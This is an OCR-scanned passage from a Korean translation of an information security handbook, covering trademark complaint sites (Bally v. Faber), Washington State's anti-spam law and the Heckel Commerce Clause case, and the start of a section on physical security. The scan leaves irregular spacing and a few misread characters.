일정한 제 한이 있다. 그 제 한성 을《 공정한 사용권》이 라고도 하는데 이것은 다른 사람 
들이 그 제 품을 묘사하기 위하여 그 상표를 쓸수 있 다는것 을 의 미한다. 바로 그 공정사 
용권이 있음으로 하여 밸리의 상표가 이 장에서 설명을 위해 제시될수 있는것이다. 만일 
1985년도산 쉐브롤레 이 쎌리브리리형승용차를 팔겠다면 제네럴 모터스회사에서 그 상표 
사용허 가를 받지 않았어 도 이 자동차는 쉐 브롤레 이 쎌 리 브리리 라고 광고할수 있 다. 경 쟁 
자들도 상품비 교에서 남의 기 록상표를 리용할수 있다. 실례 로 코카콜라광고에서 는 비 록 
펩시콜라회사에서 자기 상표를 사용할 권한을 주지 않았어도 펩시콜라보다 맛이 더 좋다 
고 광고할수 있다. 

사람들과 기관들은 상품구매에서 많은 경우 상표에 기초하여 옳바른 결심을 한 
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다. 이 법에 의하면 상표권침해로 인정할수 있는 경우는 타방에 의한 상표사용이 
《혼란을 일으키거나 실수를 초래케 하거나 기만을 목적으로 할수 있는 경우》이다. 
법정은 이런 경우 금지명령을 내리거나 손해배상을 시키거나 침해자의 리윤을 몰수 
하거나 변호비를 물릴수 있다. 법정은 지어 비법상표를 가진 제품들을 몰수하여 폐기 
할수도 있다. 

상표소유주는 자기 상품을 자기 제품뿐아니라 그 관련제품 례하면 리샤쯔나 점심밥 
곽 등에도 사용할수 있는 독점적사용권을 가진다. 권위 있는 인정된 상표는 해당 회사의 
가장 귀중한 재산일뿐아니라 회사를 팔거나 청산할 때에는 화폐적가치를 가진다. 

상표희석으로 인정되는 경우는 상표의 비법적사용이 상표의 소유주에게 있어서 재정 
적손해를 주는 경우이다. 상표희석은 반드시 상업적성격을 띠여야 가능하며 대방들사이 
의 직접적인 상업적경쟁이 없는 경우에도 발생할수 있다. 최근의 한 실례에서 볼수 있는 
바와 같이 세계적인 신용카드업체인 American Express 는 American Express Limousine 
Service 회 사가 자기 의 이 름을 사용하자 이 회 사를 소송에 제 기 하였 다. 두 회 사사이 에 경 
쟁적인 측면은 없었음에도 불구하고(하나는 신용카드회사이고 다른 하나는 승용차봉사회 
사이므로) 법정은《피고측이 American Express 라는 마크를 사용한데 대하여 이것은 원고 
의 마크의 뚜렷한 질에 손상 줄수 있다》고 판결하였다. 


상표권침해에 대한 분석 


벨리회사는 페이버의 Web 싸이트가 상표권침해는 물론 상표희석에도 해당되는 범죄 
로 된다고 주장하였다. 략식판결에서 법정은 밸리측의 모든 기소내용이 진실이라고 해도 
페이버측의 행동은 상표법위반으로 되지 않는다고 판결하였다. 상표법에 따르면 법정은 
밸리측의 상표를 페 이버측이 사용한것은 혼돈의 가능성이 있다고 판결하여야 했었다. 그 
렇게 되는 경우에만 법정은 상표권침해가 일어 났다고 볼수 있었다. 

혼란가능성이 있는가 없는가를 결정하는데서 기본요인은 두 대방의 제품에서의 류사 
성 이 다. 제품들의 호상관계 가 더 뚜렷 할수록 법정 이 상표권침해를 인정할수 있는 가능성 
은 더욱 커진다.《관련 있는 제품이란 비록 꼭 같지는 않아도 소비자들이 관련되는 제 
품이 라고 보는 그러한 제 품들이 다.》법 정들에서 는 지 금까지 다음과 같은 쌍의 제 품부류 
들을 관련상품으로 보아 왔다. 


• 샤프와 바지 

• 맥주와 위스키 

• 자물쇠와 손전지 


벨리측과 페이버측은 상품들을(하나는 건강구락부이고 다른 하나는 Web 폐지설계이 
므로) 판매하지 않았기때문에 관련상품을 통한 혼란의 우려는 거의 없었다. 그리하여 법 
정은 다음과 같이 판결을 내렸다. 
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밸리측의 공식 적 인 Web 싸이트와 폐 이 버 측의 싸이트를 비 교해 보는 그 어 느 리성적 인 
소비 자도 페 이버측의 싸이트가 해 당 상표소유자의 상표와 같거 나 련관이 있다거 나 소속이 같 
다거 나 후원을 받는다고 생 각하지 않을것 이 다. 따라서 상표권침 해 에 관한 밸리 측의 상소는 
법적으로 성립되지 않는다. 

상표회석에 대한 분석 


법정은 또한 상표희석이라는 밸리측의 주장을 략식판결할데 대한 페이버측의 신청을 
허 락하였 다. 상표가 희석되 였다는것을 증명하려 면 피 고의 상표사용에 의하여 원고의 상 
표가 자기 상품 및 봉사를 구별하고 식별하는 능력 이 떨어 져야 하며 피고의 상표사용이 
상업적성격을 띠여야 하는것이다. 상표희석이라는 주장을 증명하자면 밸리측이 페이버가 
자기 상표를 상업 적목적 에 리용하였 다는것 을 보여 주어 야 하였 다. 또한 밸리측은 페 이 버 
에 의한 상표리용으로 하여 자기 회 사제 품 및 봉사를 구별 및 식 별 하는 자기 마크의 능 
력이 떨어 져 상표의 가치가 희석되였다는것을 보여 주어야 하였다. 

사실 페 이버 가 밸리측 상표를 리용한것은 비상업적 인 성 격의것이 였다. 그는 그 상표 
를 리용하여 자기 기업의 리익을 추구한적도 없으며 따라서 밸리측은 페이버의 상표리용 
이 그 상표의 명예에 손상을 주었다는것을 제시할수 없었다. 또한 페이버의 싸이트는 소 
비자들을 혼란시키지는 않았으므로 법정은 략식 판결 제안을 수락하였던것이다. 

기관들에 주는 권고 


가장 안정하다고 생 각되 는 회 사일지라도 불평싸이트들은 골치거 리 가 아닐수 없 다. 
고객희망자들과 사원신청자들은 득 이러한 싸이트를 보고야 마는것이다. www.walmart 
sucks . com 은 지 난 3년간 100만건 이 상의 급소를 찌 르는 대 인기 작품들을 접 수하였 다고 한 
다. 이러한 문제점들을 미연에 방지하기 위한 일련의 권고사항들을 아래에 준다. 

일부 기관들은 가능한 불평싸이트의 이름들을 실지로 구매함으로써 외부사람들이 불 
평싸이트를 볼수 없게 한다. 실례 로 chase Manhatan 은 DiateChase . com ， ChaseStinks . com , 
ChaseSucks . com , ChaseBlows.com 등 이 책 에 서 는 차마 다 말하지 못할 여 러 가지 의 가능한 
불평싸이트들에 대한 Web 싸이트권을 사들였다. 그렇게 하였음에도 불구하고 어느 한 불 
평 을 품은 고객 이 자기의 불평싸이트인 chasebanksucks . com 을 설 립 하였다. 어쨌든 이 렇게 
해 놓으면 고객희 망자들이 그 싸이트를 발견 하기 더 힘 들것 이 다. 

기 관들은 정 상적 으로 자기 들과 관련된 불평싸이트들을 읽 어 보는것 이 현명할것 이 다. 
인터네 트의 자유라는 성 격 으로 하여 어 떤 Web 싸이 트의 내 용에 대 한 실제 적 인 통제 는 없 
다. 어느 한 사람이 불평이 있다고 해서 거짓소문을 퍼뜨리면 그것으로 하여 종업원들의 
사기가 저락될수 있으며 지어 회사의 명예에 금이 갈수도 있다. 

마지막으로 각 기관들은 불평싸이트에 대한 자기들의 관점을 바로 가져야 한다. 대 
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부분의 불평싸이트들은 한명의 의견 있는 고객이나 이전 종업원이 단지 자기의 울분을 
토로하는것으로는 크게 해를 주지 못한다. 대부분의 이런 싸이트들은 그 내용에서 사람 
들을 위협하는것 이 없다든가 내부보안의 약점을 통하여 입수한 현재의 비밀문건들을 게 
시하지 않는한 무시해 치워도 안전하다. 


결 론 


밸리 대 페이버사건으로 하여 개인들은 혼돈의 가능성이 없는한 이러한 불평싸이트 
들에 상표화된 마크를 리용할수 있게 되였다. 인터네트가 더욱 확대됨에 따라 불평싸이 
트普은 더욱 범상한것으로 될것이다. 각 기관들은 이 싸이트들을 잘 평가하여 봄으로써 
자기 고객들과 사원들과의 관계를 어떻게 가져야 하겠는가를 배워야 할것이다. 
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제 4 2 장. 비요청전자우편에 대한 틍제 


에드워드 에취 프리맨 


인테네 트사용자들로부터 가장 자주 신소 받는 문제 의 하나가 바로 스팸 ( spam ) 이 라 
고 부르는 비 요청전자우편의 범 람이다. 이것 을 사면 부자가 된다는 식 의 판매선전으로 
부터 금연토론회，바이애그라(최 음제 의 상품명-역 주)로부터 탈모증치 료법 에 이 르기 까지 
이러한 비요청전자우편은 별것을 다 판매하려고 애 쓴다. 인터네트사용자라면 그 누구 
든 이렇게 끊임없이 들이닥치는 비요청전자우편의 성화를 면할 방도가 없다. 스팸의 
세 계 에서 는 그 어떤것 을 주장해 도 어 처 구니 없지 않으며 그 어떤것 을 약속해 도 황홀하 
지 않게 된다. 

다량의 전자우편을 보내 자면 간단히 한대 의 개 인콤퓨터 와 모뎀 이면 충분하다. 249딸 
라를 내면 1천 1백만명이상의 전자우편주소를 담은 CD-ROM 한장을 살수 있다. 이렇게 
되 면 우편료도 인쇄비 도 필 요 없 고 주문이 나 고객 들의 문의편지 를 처 리하는 전문인원을 
채용할 필요도 없다. 

스패 머 (스팽하는 자)들은 다량전자우편의 비 용을 말단사용자들과 인 터네 트봉사제 공자 
( ISP ) 들에 게 넘 겨 씌운다. ISP 는 그들대 로 비 요청 전자우편의 처 리 및 전송을 위하여 보충 
적 인 대 역 너 비와 보관장치들을 제 공해 야 하는것 이 다. 보충적 인 보관능력까지 리용하여 
전자편지들을 보관하였다가 해당 수신자에게 넘겨 주어야 한다. 이 비용이 결국에는 다 
전자우편사용자에 게 부과된 다. 

이 장은 워 싱톤주가 스팸 에 대 한 엄격한 법 률을 실시 하기 위하여 어떻게 시도하고 있 
는가를 취급한다. 여기서는 국가헌법의 통상조항과 함께 개별적주들이 서로 다른 주의 주민 
들과 회사들의 상업활동을 제한하거나 제한하지 못하게 하려면 어떻게 하여야 하는가 하는 
문제들을 다룬다. 구체적인 문제점들을 밝히기 위하여 실지 진행된 법정실례들을 리용한다. 

워싱론주의 스팸방지법 


1998년 3월 워싱론주의회는 《 비요청전자우편법》을 만장일치로 통과시켰다. 이 법 
은 다음과 같이 지적하고 있다. 

1. 그 어떤 개인，회사，련합체나 협회도 워싱톤주에 있는 콤퓨터로부터 혹은 워싱톤 
주에 있는 주민이 소유한 우편주소에 상업적인 전자우편의 전송을 할수 없다. 워 
싱론주에 있는 주민이나 콤퓨터라고 할 때 그것은; 

• 제3자의 승인이 없이 그 3자의 인터네트령 역이름을 사용하는 경우 혹은 정보 
를 잘못 알려 주어 상업적인 전자우편의 출발지나 전송경로가 틀린 경우 

• 제목란에 허위적인 혹은 오도된 정보를 담은 경우를 다 포함한다. 
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2. 우편을 받는 사람의 전자우편주소에 포함된 인 터네 트령 역이 름의 등록자에 게 문의 
하여 보면 그 령역이름을 알수 있는 경우 개인，회사，련합체나 협회는 상업적인 
전자우편내 용의 해 당 수신자가 워 싱 론주민 이라는것 을 아는것 으로 된 다. 

이 법을 어기는 경우 벌금은 전자우편건당 100딸라로부터 1，000딸라범위로 물어야 
한다. 

처음으로 제기된 이 법은 워싱톤주의 주민들에게 보내는 비요청전자우편을 완전히 
금지시 킬수 있 었 다. 워 싱 톤주의 회 는 시 민기 본권동맹 ( ACLU ) 과 기 타 의 사표현의 자유를 
주장하는 여 러 단체들로부터 압력 이 있었으므로 초심 에서 완전금지라는 개 념은 철회하였 
다. 이 법을 반대하는 사람들은 이 법 이 《 비요청상업적의사표현에 대 하여 지 나치게 넓 
은 의미의 정의》를 담고 있다고 보았다. 이 러한 거부투쟁으로 말미암아 주의회는 허위 
적이거나 오도적인 상업전자우편은 금지한다는 식으로 간접적으로 스팸을 통제할것을 결 
정하였다. 주의회는 이러한 제한조치들이 국가헌법 제1수정조항(언론，신문，종교의 자유 
에 관한 조항임)에 반영된 우려사항들과 보다 상통한다고 보았다. 

이 법은 구체적으로 들어 가 스패머들이 흔히 쓰는 두가지 방법들을 금지시켰다. 

• 편지출발지 나 회 신주소가 오도적 으로 혹은 부정 확하게 된 편지 들은 금지시 켰 다. 

• 편지제목란에 허위적이거나 오도적인 정보가 있을 때 그 편지들은 금지시켰다. 
스패머 들은 흔히 《 당신은 벌써 1000딸라를 엄 었습니 다》혹은《 당신의 전문분 
야의 직업을 엄을수 있는 좋은 기회입니다》등과 갈은 글을 제목란에 써넣음으 
로써 호기심 많은 사용자들이 그 편지를 읽어 보지 않으면 안되게 한다. 만약 
전자우편이 이러한 제목이 있어서 일종의 계주식판매전략을 추구하는 경우 그 
전자우편은 워싱톤주의 법을 어긴것으로 된다. 

이 법은 주의 법이므로 그 범위는 지리적으로 워싱톤주에 제한되여 있었다. 스패머 
가 그 법을 위반하였다고 판단될수 있는 경우는 오직 그의 를퓨터가 물리적으로 워싱톤 
주에 위치하고 있는 경우 혹은 보내는 사람이 받는 사람의 위치가 워싱톤주라는것을 알 
고 있는 경우이다. 법에 명백히 지적된바와 같이 《받는 사람의 전자우편주소에 있는 인 
터네 트령 역이 름의 등록자로부터 그 정 보를 얻 을수 있는 경우》보내 는 사람은 받는 사람 
이 워싱톤주에 위치하고 있다는것을 안것으로 간주된다. 

주검 찰총장과 워 싱 톤주인 터네 트봉사제 공업 체련맹 ( WAISP ) 은 워 싱 톤주민들이 가지 고 
있는 전자우편구좌에 대한 주적인 등록사업을 공동주최하여 진행하였다. 워싱톤주에 있 
는 전자우편가입자들은 http :// regi 的 " y . waisp . org 에 있는 WAISP 페 지를 접근하여 자기들의 
구좌를 등록할수 있 었다. 법 에 의하면 스패 머 들은 자기 들의 전자우편을 보내 려 고 하는 
대상들에 대하여 WAISP 목록을 놓고 대조하여 보고 받을 사람들이 워싱론주에 살고 있 
는가를 결정해 야 하며 만일 전자우편내 용이 주의 법 에 어긋나는 경우 그 사용자에게 보 
내지 말아야 한다. 
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소송사건의 진상 


소송당시 25살쯤 되는 제 이슨 헤켈은 오리건주 소재지 인 쎄 일럼에서 Natural Instinct 
의 단일소유자였다. 1997년에 헤 켈은 《 인터네 트에서 어 떻게 리득을 볼것 인가》라는 제 
목의 46페 지 짜리 소책 자를 하나 써 서 인쇄하였 다. 그 소책 자는 39.95 딸라에 팔렸 다. 

그 도서를 대 량 판매 하기 위 하여 헤 켈은 Extractor Pro 라는 쏘프트웨 어를 리 용하였다. 
그 쏘프트웨어는 인터네트상에서 전자우편주소들을 찾아 자동적으로 그 주소들에 전자우 
편을 보내 준다. 도서 판매 를 촉진하기 위하여 매 달 최 고 100만통의 비 요청전자우편을 보 
냈 다. 이 편지 들은 워 싱 톤주의 사용자들을 포함한 전 세 계 인 터네 트사용자들에 게 다 보내 
여 졌다. 소송에서는 매달 약 40부의 책을 팔았다고 제기되였다. 

헤 켈의 도서 판매 수법 은 스패머 들에 게서 볼수 있는 전형 적 인 수법이 였 다. 

• 그는 인터네 트상에서 간접 적 으로 우회 적 인 경 로로 편지 를 보냄 으로써 편지 의 원 
천지를 알수 없게 하였다. 

• 받는 사람들이 회신할 방도를 주지 않았다. 《보내는 사람》란에는 전자우편주 
소가 없었다. 받은 사람들이 편지내용에 대하여 신소를 하면 주소가 불명확하여 
전달되 지 못하고 되돌아 오군 하였 다. 만일 헤 켈의 소책 자를 구매하려 한다면 
신용카드번호를 가지 고 보통우편을 리용하여 야 하였 다. 

• 그는 《 이 주소가 맞는지 요?》라는 식 으로 기 만적 인 제 목을 리용하였 다. 이 런 
제목을 말았으므로 사용자들은 속히워 그 편지가 오래동안 만나지 못했던 친구 
나 동업자들한테서 온것으로 생각하고 편지를 열어 보게 되였다. 

워싱톤주검찰소는 이러한 헤켈에 대한 신소를 여러건 받았다. 그들은 헤켈에게 워싱 
톤주민들에게 이런 우편을 보내는것을 그만둘것을 요구하는 경고편지를 보냈다. 헤켈이 
그에 불복하자 검 찰소는 법 조항위 반으로 그를 워 싱 톤주최 고재 판소에 기 소하였 다. 

재판에서 해켈의 변호사는 이 법자체가 국가헌법의 통상조항을 위반하고 있다고 
주장하면서 사건심의를 재판소가 기각할것을 요구해 나섰다. 통상조항은 주와 주사이 
의 통상에 지 나친 부담이 가해 지 는 경 우 매 주들의 주사이통상규제 권한을 제 한하고 
있 다. 

2000년 3월 10일 킹현의 상급재판소의 재판장 파커 로빈슨은 헤켈측의 제의를 받 
아 들이고 주의 법 이 위 헌적 이 라고 판결 하고 그 소송사건을 기 각하였 다. 로빈슨에 의 
하면 그 법은 《적절치 않게 제한적이며 부담적》이다. 이 법은 기업에 부담을 줌으로 
써 소비 자들에 게 돌아 가는 리득을 더 적 게 하였 다. 싸이버공간에 서 매 우편접 수자가 
어느 주에서 사는가를 판단한다는것은 어렵다. 이렇게 되면 《헤켈같은 사람은 50개주 
의 통상규범들에 매여야 하는데 나는 통상조항에 비추어 볼 때 이것은 문제가 있다고 
본다》. 

2000년 4월 10일 주검 찰총장은 로빈슨재판장의 판결내용을 주최고재판소의 상고심의 
로 제출하였다. 2000년 7월 현재까지 주최고재판소는 아직 관결을 내리지 못하고 있었다. 
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주호상간통상조항 


독립전쟁이 끝나갈 무렵에 개별적인 주들에서는 자기 주의 리익만 생각하면서 주호 
상간 및 국제통상을 규제하려고 하였다. 당시의 련맹의회는 국가적인 헌법이 채택되기전 
까지 각 주들을 대표하는 의회로서 주호상간 통상을 규제 할 권한이 없었다. 매 주가 자 
체의 리익만을 앞세움으로 하여 13가지나 되는 서로 충돌하는 통상규제법안과 세금방책 
이 새 로 련 합된 국가를 지 배하게 되 였 다. 이 로부터 서 로 다른 시 장과 관세，산업 들로 하 
여 주들호상간에 서로 보복하는 현상이 생겼으며 주들사이에는 모순이 커지게 되였다. 

1786년 1월 버지 니 아주의회 는 단일한 통상규제체 계 를 내 오기 위한 전국적 인 회의소 
집 을 제 기하였다. 1787년에 열린 헌법채 택대회 에서 국회 는 《 외 국과의 통상，주호상간통 
상，인디안종족들과의 통상을 규제》할데 대한 권한을 부여 받았다. 이 통상조항이라고 
하는 국회 권한이 있음으로 하여 국회 는 나라의 경제 생 활을 규제하며 주경계 선안에서 는 
물론 주호상간통상의 자유로운 흐름을 촉진할수 있는 권한을 가지게 되였다. 

자기 주의 활동을 통제 하고 규제 하려 는 주의 권리 와 주호상간통상에 대 한 통제 권을 
유지 하려 는 련 방정 부의 속심사이 에 는 자연히 모순이 있기 마련 이 다. 통상조항의 항목들 
은 수많은 최고재판소판결이 있지 않으면 안되게 되였다. 최고재판소는 통상조항이 경제 
와 기 업을 규제하는 사실상의 완전한 권한을 국회 에 부여하는것 이 라고 해석하였다. 다음 
과 같은 여 러 요인들을 균형 적 으로 고려한 후 재 판소는 주의 회결정 을 무효화할수도 있 
다. 

• 주호상간통상에 대 한 주규제 일 치 의 필 요성 과 중요성 

• 주호상간통상에 이 규제조치 가 주는 부담 

• 이 규제 조치 가 자기 주의 리 해 관계 를 우선시 하고 주호상간통상을 경 시 하는 정 도 

주들이 지역적관심사로 되는 문제들을 립법화할수 있는 일련의 권한들을 가지고 있 
는것은 사실 이 다. 재 판소들은 주들이 일정한 형 태의 주호상간통상을 규제할수 있는가 없 
는가를 3가지 조항으로 된 시험을 거쳐 판결한다. 

• 이 법이 다른 주를 차별시하지 않는가 

• 법의 내용이 전국적 혹은 유일규제조치를 필요로 하는것이 아닌가 

• 이 주의 리익이 련방정부의 주호상간통상규제권보다 더 우위에 놓이지 않는가 

재관소는 이러한 요인들을 건별로 분석한다. 이 분석을 토의하면서 최고재판소는 
이렇게 개괄하였다. 《법조항이 합법적인 해당 지역의 공익이 실시되도록 균형적인 규 
제조치를 취하여 주호상간통상에 미치는 영향이 단지 우발적인 경우 이러한 통상에 가 
해지는 부담이 지역리익과 비교해 볼 때 명백히 과도하지 않는 조건에서 그 법을 지지 
할것이다.》 

이 분석 적방법 의 한가지 실례 는 고전적 이라고 불리우는 1949년의 련방최 고재 판소판 
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결에서 생겨 났다. H . P 후드라고 하는 매씨츄쎄 츠주에 사는 우유공급업 자는 뉴욕주에 있 
는 농민들로부터 우유를 샀다. 그는 그 우유를 매씨츄쎄 츠주에 있는 공장들에 가져 다가 
가공하여 주소재지 인 보스턴시에서 팔았다. 후드는 뉴욕주 농업 및 시장담당국장에게 새 
로운 우유가공공장을 꾸리 려 고 허 가를 신청하였 다. 국장은 우유가공공장을 건설 하면 뉴 
욕의 우유가 다른 곳으로 흘러 가므로 뉴욕의 우유값이 상승할것 이 라는 리유로 후드의 
청 구를 거 절 하였 다. 

최 고재 판소는 자기 의 구매 자들에 게 낮은 가격 을 유지할 목적 으로 주호상간통상을 단 
절할 권리가 뉴욕주에 없다고 판결을 내렸다. 이 행동은 주들사이의 자유무역에 하나의 
장벽을 쌓아 놓을번 하였다. 어느 주도 세금징수력 이나 자기의 경찰력을 동원하여 다른 
주의 상품에 대 한 경쟁적 인 경제장벽 을 구축할수 없다. 이 런 조치들은 헌법의 통상조항 
을 위반하는것으로 되며 결국에는 위헌적인것으로 되였다. 

법정들에서는 앞으로도 계속 통상조항을 세밀히 분석규정하는 판결들을 계속 내 릴것 
이 다. 최 고재 판소가 헤 켈 사건 이 나 다른 주의 류사한 사건을 마침 내 는 관결 할것 이 다. 


헤켈사건의 분석 


앞에서도 언급되였지만 로빈슨재판관의 판결은 그 법이 통상조항을 위반했기때문에 
위 헌적 이 라고 언급하였다. 그 판결은 싸이버공간의 세계 에서는 일 반적 으로 부정적 인 평 
가를 받았다. 이 비판은 세가지 주요한 요인들에 바탕을 두고 있다. 

• 일부 비 평 가들의 견해 에 의하면 스팸 이 통상조항의 보호를 받는 주호상간통상의 
수준에까지는 이르지 못한다는것이다. 또한 스패머와 우편을 받아 본 사람사이 
에는 그 어떤 상업적인 거래가 일어 나지 않았으며 단지 비요청적이며 바라지도 
않은 전자우편만 있었다. 

• 재 판관 로빈슨의 견해 에 의 하면 헤 켈 에 게 있 어 서 어 느 우편접 수자가 워 싱 톤주에 
살고 있는가를 결정하는것 은《 부담적》이 다. 비 평 가들의 견해 에 의하면 헤 켈의 
스팸 을 보내게 하는것은 ISP 와 전자우편을 받는 사람들에 게 다같이 부담으로 된 
다는것이다. 헤켈이 자기 편지들을 보낼 《권리》는 결국 ISP 가 그 우편을 보관 
한 보충적 인 하드구동기 공간을 제 공해 야 된 다는것 을 의 미한다. 사용자역 시 이 러 
한 편지들을 삭제하느라고 많은 시간을 랑비해야 한다. 명백히 보건대 헤켈의 
스팸 은 ISP 와 전자우편사용자들에 게 생 산성 과 추가적 인 하드웨 어원가의 두 측면 
에서 부담을 조성 하였다. 

• 각 주들은 오래전에 벌써 주밖의 원격판매업자들과 잡동사니팍스를 제한하는것 
과 같은 소비 자보호조치들을 법 화하였다. 이 러한 비요청광고방법 과 스팸사이 에 
는 실지 차이가 전혀 없다. 

련방재판소에서 이 문제들에 대하여 최종판결을 내릴것이다. 
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결 론 


전문가들은 스팽이 계속될것으로 의견을 같이 하고 있다. 대부분의 인터네트사용자 
들은 비요청편지 특히 무례한 편지들을 싫어 하고 있다. 스팸은 세계적으로 값눅게 광고 
하고 편지를 보내는 하나의 방법으로 되였다. 그러나 비량심적이며 사기적인 사람들은 
이 방법 을 리 용하여 이 러 저 러 한 모든 제 품들을 판매 하는데 열을 올릴 것 이 다. 

국회 의 원들，변호사들，시 민권운동가들，싸이 버 공간전문가들은 절도，사기，악용건까 
지 포함하여 비요청전자우편을 제한하기 위한 합헌적 인 방법을 계속 탐구해 나가야 할것 
이다. 법정은 법정대로 스팸으로부터의 어떤 정보의 보호가 통상조항상으로 합헌적인가 
를 판결할것이다. 
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제 1 0편 
물리적 보안 


이 편에서는 정보보안계획 이 기초층 즉 물리적보안층이라는 매우 중요한 문제에 대 
하여 취급한다. 이 편의 두개 장에서는 다 위험평가와 원만한 조종을 실현하기 위하여 
전개하여 야 할 방법론과 사유과정을 정의한다. 

그 과정은 다음과 같다. 

1. 시설과 체계환경을 리해하는것 

2. 시설들을 부류에 따라 구분하는것 

3. 자기 가 소유하였 거 나 임 대 받은 시 설 들의 비 중을 고려하는것 

4. 보호우선권을 결정하는것 

5. 보호필요사항을 결정하는것 

6. 핵심적인 자산들을 식별하는것 

7. 위험을 분석하는것 

8. 자연적인 위협요소 

9. 사람에 의한 위 협 요소 

10. 환경 에 의한 위 협 요소 

11. 인적 요인을 고려하는것 

12. 물리 적보안의 심 리적관계 

13. 보안의식과 보안전습 

14. 사회공학 

15. 기 타 위 험 관리기 능들과의 협 동 

필 자 크리스토퍼 스타인커는 다음과 같이 말하고 있다. 《100%안전한것은 없다는 
일반적관점 에서 보면 정 보보안은 보안층의 심부를 리용하여 가장 높은 형 태의 보안을 달 
성한다. 이 층들가운데 서 어 떤 층에 약점 이 있으면 보안은 파괴될것 이 다. 물리 적보호는 
정 보보안의 계 층적 과정 에 서 첫 번째 층이 다. 만일 그것 이 존재하지 않거 나 취 약하거 나 오 
용된다면 정 보보안은 실패할것 이 다》. 
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제 4 3 장. 물리적보안은 정보보안의 기초 

크리스토퍼 스타인커 

물리적보안이란 절도，간첩행위，파괴 및 해독행위로부터 사람이나 사물의 안전과 물 
질적존재를 담보하기 위하여 취해 지는 조치라고 말할수 있다. 정보보안의 견지에서 볼 
때 이것은 정보，제품，사람에 대한 보안을 의미한다. 

물리적보안은 가장 오랜 형태의 보안이다. 오래전부터 사람들은 피해로부터 자기자 
신을 보호해 왔으며 절도나 파괴로부터 자기들의 재산을 보호하여 왔다. 지난날에는 물 
리적보안이 사람에게 안전성을 지니게 하기 위한 보호가 전부였다. 그러나 기술의 발전 
으로 물리적보안만으로는 보안효과를 볼수 없다. 정보보안은 각이한 보안층들을 전개하 
여 자기 의 목표를 달성하는 수법이 며 때 문에 《 계 층형보안》이 라고 하는것 이 다. 100%안 
전한것은 없다는 공통된 인식으로부터 출발하여 정보보안은 많은 층을 리용하여 가장 높 
은 형태의 보안을 달성한다. 이 층들가운데서 어떤 층에서 약점이 있으면 보안은 파괴될 
것 이 다. 물리적보안은 정보보안의 계층적방법에서 첫 단계 이 다. 만일 그것 이 존재하지 않 
거나 취 약하거 나 잘못 실 행 된 다면 정 보보안은 실 패 할것 이 다. 

물리적보안에 대한 관점과 립장 

물리적보안은 아무런 준비없이는 착수할수 없는 련속적인 과정이다. 물리적보안은 
반드시 기관의 목표에 부합되여야 하며 정보보안방책에서 제시된 기준과 지침에 따라 적 
용되여 야 한다. 

물리 적 보안의 세 계 에 는 변화가 거의 없 으므로(정 보보안에 서 이여의 통제 들처 럼 그렇 
게 빠르지 않다) 그것읕 흔히 지루하고 중요치 않는것으로 간주된다. 이 오유로 하여 물 
리적보안은 종종 소홀히 되거나 되는대로 실행되게 된다. 대체로 정보보안통제의 가장 
큰 약점은 통제 그자체가 아니 라 통제를 정확히 적용하지 못하는데 있다. 물리적보안에 대 
하여서는 다른 정보보안의 통제에서와 곡갈은 노력，곡갈은 힘，곡갈은 신중성을 기해야 
한다. 사실 보안통제는 예견성 있고 반복적 이며 효과적 인 정보보안을 달성하여 야 한다. 

자물쇠，경비원，감시카메라，식별휘장들은 단순히 물리적보안의 도구와 장비인것이 
다. 물리적보안을 계획하고 설계하려면 다음의 질문에 대 답을 주어 야 한다. 

• 무엇을 보호하려고 하는가 

• 보호할 정보가 얼마나 중요한가(경제적으로，정치적으로，사회적안전상으로) 

• 누구를 위해 보호하며 그중 어느것이 중요한가 

• 무엇으로부터 누구로부터 보호하려고 하는가 
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모든 곳에서 다 녹스요새(정부의 금괴보관고가 있는 곳)만큼 엄격한 물리적보안이 
요구된다고 할수는 없으나 물리적보안은 보호되는 사람과 정보의 중요성에 따라 적용되 
여야 한다. 이 장에서는 정보보안에서의 일반적인 위협요소와 약점들에 의하여 생기는 
위험에 대하여 그리고 물리적보안에서 이러한 위험관리의 기초가 어떻게 마련되는가에 
대하여 보기로 한다. 


물리적보안의 심리 


물리적보안을 계획하고 설계할 때에는 그것이 물리적이면서도 심리학적이라는것을 
알아야 한다. 심리학적영향이 가져 올수 있는 좋은점들에 대하여 고려하는것이 중요하다. 
가령 물리적보안이 잘 보일수 있게 설계되는 경우(세부내용들은 보이지 않게 보호하면 
서) 외부침해의 표적이 될수 있는 가능성이 적으므로 자기 기관이 잘 보호된다고 말할수 
있다. 이것은 그 기관에 대하여 범죄를 저지르려는 욕망을 제거하기 위한 간접적인 수법 
의 하나로 된다. 물리적보안의 효과성이 다른 보안통제와 마찬가지로 침습의 기회를 줄 
이는데 달려 있다면 물리적보안의 심리는 그 욕망을 줄이는데 달려 있다. 

시설의 물리적보안 


현대작업장의 다양성으로 하여 보편적인 엄격한 물리적보안표준을 수립하는것은 비 
현실적이다. 그러나 매 장소에서 물리적보안을 잘 보장하는것은 완전하고 안전한 환경을 
달성하는데 반드시 필요하다. 이 부분에서는 시설들의 형태를 개괄하고 그것이 어떻게 
다른가와 매 시설에 대한 물리적보안에 대하는 방도들을 서술한다. 

시설의 구분 

시설들은 다음과 같은 일반적인 부류로 갈라 볼수 있다. 

• 소유한 시설. 소유한 시설은 대체로 물리적보안을 유지하기에는 가장 단순한 구 
조일것이다. 보안관리가 원래 쉬운것은 소유자가 그 시설에 대한 완전한 행정적 
관리통제를 가지고 있는것과 관련된다. 이렇게 되면 유연성이 있어 소유자나 관 
리자가 임의의 물리적보안통제를 임의의 방법으로 하여 보안목적을 달성할수 있 
게 된다. 소유한 시설의 기본결함은 물리적보안이 파괴되는 경우 소유자가 전적 
인 책임을 져야 한다는것이다. 소유한 시설의 가장 좋은 실례는 대기업의 본부 
이다. 

• 비소유시설. 비소유시설은 물리적보호가 좀 더 힘들수 있다. 관리자나 소유자는 
물리적보안이 파괴되면 각각 법적책임을 지게 된다. 례를 들어 수도관이 터져 
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콤퓨터실이 물에 잠기면 콤퓨터실거주자는 소유자가 수도관을 잘 보수하지 못했 
다는것이 발견되는 경우 그 피해에 대하여 책임을 지울수 있다. 이 경우 비소유 
시설은 물리적보안파괴에 대한 법적고소대상이 있다는 유리한 점이 있다. 비소 
유시설의 실례는 건물거주자가 세를 내지만 소유하지 않은 건물 등이다. 

• 공유시설. 공유시설은 대체로 그 형태가 가장 각이하며 위협적인 요소들이 많은 
시설들로서 대부분의 구조물들은 이런것들이다. 이 시설들은 하나이상의 시설거 
주자를 가지며 그중 일부 거주자는 대체로 경쟁자들이다. 그 시설은 모든 거주 
자들(주어 진 지역에 있는)에게 곡같은 리용권을 주어야 하기때문에 물리적보호 
가 매우 힘든것으로 된다. 공유시설의 좋은 실례는 종합청사와 공동청사나 거주 
